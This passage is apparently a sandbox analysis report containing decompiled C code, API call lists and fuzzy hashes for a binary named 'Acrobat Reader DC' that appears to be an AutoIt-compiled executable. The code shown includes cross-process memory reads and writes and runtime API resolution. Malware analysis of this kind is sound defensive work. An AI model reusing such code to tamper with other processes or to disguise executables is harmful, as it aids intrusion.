                                  C-Code - Quality: 95%
                                  			E0043659E(struct HWND__** _a4, char _a8, intOrPtr* _a12) {
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				void* _v24;
                                  				signed int _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				char _v168;
                                  				void* __edi;
                                  				intOrPtr _t58;
                                  				struct HWND__** _t83;
                                  				struct HWND__* _t95;
                                  				char* _t100;
                                  				struct HWND__** _t101;
                                  				long _t106;
                                  				long _t107;
                                  
                                  				_t83 = _a4;
                                  				E00410620( &_v168);
                                  				_v24 = _a8;
                                  				_t106 = E004343AD( &_v168, 0x10,  *_t83);
                                  				E00434319( &_v168,  &_v24, _t106, 0x10);
                                  				_t95 =  *_t83;
                                  				SendMessageW(_t95, 0x1104, 0, _t106);
                                  				E004342DD( &_v168, _t106,  &_v24, 0x10);
                                  				_t101 = _v24;
                                  				asm("cdq");
                                  				_t58 = (_v12 - _v20 - _t95 >> 1) + _v20;
                                  				 *((intOrPtr*)(_a12 + 4)) = _t58;
                                  				_v36 = _t58;
                                  				_t107 = E004343AD( &_v168, 0x10,  *_t83);
                                  				if(_t101 > _v16) {
                                  					L6:
                                  					E00410640( &_v168);
                                  					return 0;
                                  				} else {
                                  					while(1) {
                                  						_v40 = _t101;
                                  						E00434319( &_v168,  &_v40, _t107, 0x10);
                                  						SendMessageW( *_t83, 0x1111, 0, _t107);
                                  						E004342DD( &_v168, _t107,  &_v40, 0x10);
                                  						if((_v32 & 0x00000040) != 0) {
                                  							break;
                                  						}
                                  						_t101 = _t101 + 1;
                                  						if(_t101 <= _v16) {
                                  							continue;
                                  						} else {
                                  							E00410640( &_v168);
                                  							return 0;
                                  						}
                                  						goto L13;
                                  					}
                                  					if(_t101 <= _v16) {
                                  						_a4 = _t101;
                                  						while(1) {
                                  							_v40 = _t101;
                                  							E00434319( &_v168,  &_v40, _t107, 0x10);
                                  							SendMessageW( *_t83, 0x1111, 0, _t107);
                                  							_t100 =  &_v168;
                                  							E004342DD(_t100, _t107,  &_v40, 0x10);
                                  							if((_v32 & 0x00000040) == 0) {
                                  								break;
                                  							}
                                  							_t101 = _t101 + 1;
                                  							if(_t101 <= _v16) {
                                  								continue;
                                  							} else {
                                  								E00410640( &_v168);
                                  								return 0;
                                  							}
                                  							goto L13;
                                  						}
                                  						if(_t101 > _v16) {
                                  							goto L6;
                                  						} else {
                                  							asm("cdq");
                                  							 *_a12 = _a4 + (_t101 - _a4 - _t100 >> 1);
                                  							E00410640( &_v168);
                                  							return 1;
                                  						}
                                  					} else {
                                  						goto L6;
                                  					}
                                  				}
                                  				L13:
                                  			}




















                                  APIs
                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                  • String ID: @
                                  • API String ID: 4150878124-2766056989
                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E00434B02(CHAR* _a4, CHAR* _a8, signed int* _a12) {
                                  				struct HINSTANCE__** _v8;
                                  				struct HINSTANCE__* _v12;
                                  				void* __edi;
                                  				void* __esi;
                                  				struct HINSTANCE__* _t44;
                                  				struct HINSTANCE__** _t45;
                                  				_Unknown_base(*)()* _t50;
                                  				_Unknown_base(*)()*** _t63;
                                  				_Unknown_base(*)()* _t66;
                                  				CHAR* _t92;
                                  				signed int _t94;
                                  
                                  				_t92 = _a4;
                                  				_t44 = LoadLibraryA(_a8);
                                  				_v12 = _t44;
                                  				if(_t44 != 0) {
                                  					_t66 =  *(_t92 + 8);
                                  					_t94 = 0;
                                  					__eflags = _t66;
                                  					if(__eflags != 0) {
                                  						_t63 =  *(_t92 + 4);
                                  						while(1) {
                                  							__eflags =  *( *_t63);
                                  							if(__eflags == 0) {
                                  								goto L6;
                                  							}
                                  							_t94 = _t94 + 1;
                                  							_t63 =  &(_t63[1]);
                                  							__eflags = _t94 - _t66;
                                  							if(__eflags < 0) {
                                  								continue;
                                  							}
                                  							goto L6;
                                  						}
                                  					}
                                  					L6:
                                  					_push(0xc);
                                  					_t45 = E004115D7(_t92, _t94, __eflags);
                                  					_v8 = _t45;
                                  					__eflags = _t94 - _t66;
                                  					if(_t94 != _t66) {
                                  						 *(( *(_t92 + 4))[_t94]) = _t45;
                                  					} else {
                                  						E00436299(_t92,  &_v8);
                                  					}
                                  					 *( *(( *(_t92 + 4))[_t94])) = _v12;
                                  					_t50 = GetProcAddress( *( *(( *(_t92 + 4))[_t94])), "AU3_GetPluginDetails");
                                  					__eflags = _t50;
                                  					if(_t50 != 0) {
                                  						_a4 = 0;
                                  						_a8 = 0;
                                  						 *_t50( &_a4,  &_a8);
                                  						( *(( *(_t92 + 4))[_t94]))[1] = _a4;
                                  						 *_a12 = _t94;
                                  						( *(( *(_t92 + 4))[_t94]))[2] = _a8;
                                  						__eflags = 0;
                                  						return 0;
                                  					} else {
                                  						FreeLibrary( *( *(( *(_t92 + 4))[_t94])));
                                  						_push( *(( *(_t92 + 4))[_t94]));
                                  						E004111DC();
                                  						 *(( *(_t92 + 4))[_t94]) = 0;
                                  						return 3;
                                  					}
                                  				} else {
                                  					return 3;
                                  				}
                                  			}















                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: AU3_GetPluginDetails
                                  • API String ID: 145871493-4132174516
                                  • Opcode ID: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                  • Opcode Fuzzy Hash: 303b09ba93ab0ed03a6a9af2e9b2030e100027d68ccb66b8423d63a3e79e3eeb
                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                  • String ID: crts
                                  • API String ID: 943502515-3724388283
                                  • Opcode ID: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                  • Opcode Fuzzy Hash: 2d82e50f2031013929f3e7369429b0b1e1aeb80a721c9f7d558a3d87c3c8a39b
                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004312CC(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("ICMP.DLL");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "IcmpCloseHandle");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                  • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCloseHandle
                                  • API String ID: 2574300362-3530519716
                                  • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                  • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                  • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004312FE(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("ICMP.DLL");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "IcmpCreateFile");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                  • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpCreateFile
                                  • API String ID: 2574300362-275556492
                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043129A(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("ICMP.DLL");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "IcmpSendEcho");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: ICMP.DLL$IcmpSendEcho
                                  • API String ID: 2574300362-58917771
                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430C7F(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("advapi32.dll");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "RegDeleteKeyExW");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                  • API String ID: 2574300362-4033151799
                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430DC1(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("kernel32.dll");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "GetSystemWow64DirectoryW");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                  • API String ID: 2574300362-1816364905
                                  • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                  • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                                  • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                                  • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00430E7B(struct HINSTANCE__** _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				_Unknown_base(*)()* _t5;
                                  				struct HINSTANCE__** _t6;
                                  
                                  				_t6 = _a4;
                                  				if(_t6[2] == 0) {
                                  					_t4 = LoadLibraryA("kernel32.dll");
                                  					 *_t6 = _t4;
                                  					if(_t4 != 0) {
                                  						_t5 = GetProcAddress(_t4, "GetModuleHandleExW");
                                  						_t6[2] = _t5;
                                  						return _t5;
                                  					}
                                  				}
                                  				return _t4;
                                  			}







                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetModuleHandleExW$kernel32.dll
                                  • API String ID: 2574300362-199464113
                                  • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                  • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
                                  • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
                                  • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EF60(struct HINSTANCE__** __esi) {
                                  				struct HINSTANCE__* _t3;
                                  				_Unknown_base(*)()* _t4;
                                  
                                  				if(__esi[2] == 0) {
                                  					_t3 = LoadLibraryA("kernel32.dll");
                                  					 *__esi = _t3;
                                  					if(_t3 != 0) {
                                  						_t4 = GetProcAddress(_t3, "IsWow64Process");
                                  						__esi[2] = _t4;
                                  						return _t4;
                                  					}
                                  				}
                                  				return _t3;
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E5C8), ref: 0040EF6B
                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsWow64Process$kernel32.dll
                                  • API String ID: 2574300362-3024904723
                                  • Opcode ID: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                  • Instruction ID: 8a5e235981a70bd178cc672d1476e78975e513144aeeb8d5c54acf6a3c23c6fb
                                  • Opcode Fuzzy Hash: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
                                  • Instruction Fuzzy Hash: DCD0C9B4A00B03EAD7301F72DA1870A76E4AB10781F204C3EBC81E5290DBBCC0808B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EFD0(struct HINSTANCE__** __esi) {
                                  				struct HINSTANCE__* _t3;
                                  				_Unknown_base(*)()* _t4;
                                  
                                  				if(__esi[2] == 0) {
                                  					_t3 = LoadLibraryA("kernel32.dll");
                                  					 *__esi = _t3;
                                  					if(_t3 != 0) {
                                  						_t4 = GetProcAddress(_t3, "GetNativeSystemInfo");
                                  						__esi[2] = _t4;
                                  						return _t4;
                                  					}
                                  				}
                                  				return _t3;
                                  			}






                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,0040E620), ref: 0040EFDB
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EFED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                  • API String ID: 2574300362-192647395
                                  • Opcode ID: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                  • Instruction ID: faea892368b665db3229cc6598da919ac71bc07d19fee151484258049274b373
                                  • Opcode Fuzzy Hash: 32947d03ff8d1999084252166fef1046a2fe6e8e233e406c4d74cfb9fa3109ee
                                  • Instruction Fuzzy Hash: DAD092B4900B03AAD7301F22D91860A76A4AB00781B204C2EA981E5290DEB880809B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00451D2B(char _a4, intOrPtr _a8, WCHAR* _a12, WCHAR** _a16) {
                                  				WCHAR* _v8;
                                  				char _v12;
                                  				WCHAR* _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* __esi;
                                  				intOrPtr* _t137;
                                  				signed int _t140;
                                  				intOrPtr* _t141;
                                  				intOrPtr* _t146;
                                  				signed int _t148;
                                  				char _t149;
                                  				intOrPtr* _t150;
                                  				signed int _t153;
                                  				intOrPtr* _t166;
                                  				intOrPtr* _t169;
                                  				intOrPtr* _t174;
                                  				intOrPtr* _t177;
                                  				signed int _t179;
                                  				intOrPtr* _t180;
                                  				intOrPtr* _t183;
                                  				intOrPtr* _t190;
                                  				char _t192;
                                  				signed int _t194;
                                  				intOrPtr* _t195;
                                  				intOrPtr* _t198;
                                  				signed int _t200;
                                  				intOrPtr* _t201;
                                  				intOrPtr* _t205;
                                  				WCHAR** _t218;
                                  				signed int _t220;
                                  				signed int _t222;
                                  				char _t227;
                                  				signed int _t231;
                                  				signed int _t232;
                                  				intOrPtr* _t235;
                                  				intOrPtr _t237;
                                  				intOrPtr* _t238;
                                  				short* _t241;
                                  				intOrPtr* _t243;
                                  				intOrPtr* _t247;
                                  				char _t248;
                                  				intOrPtr _t252;
                                  				WCHAR* _t254;
                                  				signed int _t271;
                                  				signed int _t274;
                                  				char _t288;
                                  				intOrPtr _t306;
                                  				WCHAR* _t307;
                                  				signed int _t308;
                                  				signed int _t309;
                                  				signed int _t310;
                                  				signed short _t311;
                                  				signed int* _t312;
                                  				signed short _t313;
                                  				signed int _t314;
                                  				void* _t315;
                                  
                                  				_t137 = _a4;
                                  				_t218 = _a16;
                                  				_t306 = _a8;
                                  				_t218[3] = 0;
                                  				_a4 = 0;
                                  				 *_t218 = 0;
                                  				_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x10))))(_t137, 0, 0x800,  &_a4);
                                  				if(_t310 >= 0) {
                                  					_t140 = E00430EDF( &_a4, 0);
                                  					__eflags = _t140;
                                  					if(_t140 == 0) {
                                  						_t141 = _a4;
                                  						_v8 = 0;
                                  						_t310 =  *((intOrPtr*)( *((intOrPtr*)( *_t141 + 0xc))))(_t141,  &_v12);
                                  						__eflags = _t310;
                                  						if(_t310 < 0) {
                                  							goto L1;
                                  						} else {
                                  							_t227 = _v12;
                                  							__eflags =  *((intOrPtr*)(_t227 + 0x28)) - 3;
                                  							if( *((intOrPtr*)(_t227 + 0x28)) != 3) {
                                  								L12:
                                  								_t146 = _a4;
                                  								_v20 = 0xffffffff;
                                  								_t148 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x28))))(_t146,  &_a12, 1,  &_v20);
                                  								__eflags = _t148;
                                  								if(_t148 >= 0) {
                                  									L15:
                                  									_t149 = _v12;
                                  									_t311 = 0;
                                  									__eflags = 0 -  *((intOrPtr*)(_t149 + 0x2c));
                                  									if(0 >=  *((intOrPtr*)(_t149 + 0x2c))) {
                                  										goto L30;
                                  									} else {
                                  										while(1) {
                                  											_t166 = _a4;
                                  											_t308 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x14))))(_t166, _t311 & 0x0000ffff,  &_v8);
                                  											__eflags = _t308;
                                  											if(_t308 < 0) {
                                  												break;
                                  											}
                                  											_t247 = _v8;
                                  											__eflags =  *(_t247 + 0x10) & 0x00000003;
                                  											if(( *(_t247 + 0x10) & 0x00000003) == 0) {
                                  												L19:
                                  												_t174 = _a4;
                                  												 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x50))))(_t174, _t247);
                                  												_t248 = _v12;
                                  												_t311 = 1 + _t311;
                                  												_v8 = 0;
                                  												__eflags = _t311 -  *((intOrPtr*)(_t248 + 0x2c));
                                  												if(_t311 <  *((intOrPtr*)(_t248 + 0x2c))) {
                                  													continue;
                                  												} else {
                                  													goto L30;
                                  												}
                                  											} else {
                                  												__eflags =  *_t247 - _v20;
                                  												if( *_t247 == _v20) {
                                  													goto L30;
                                  												} else {
                                  													goto L19;
                                  												}
                                  											}
                                  											goto L51;
                                  										}
                                  										_t169 = _a4;
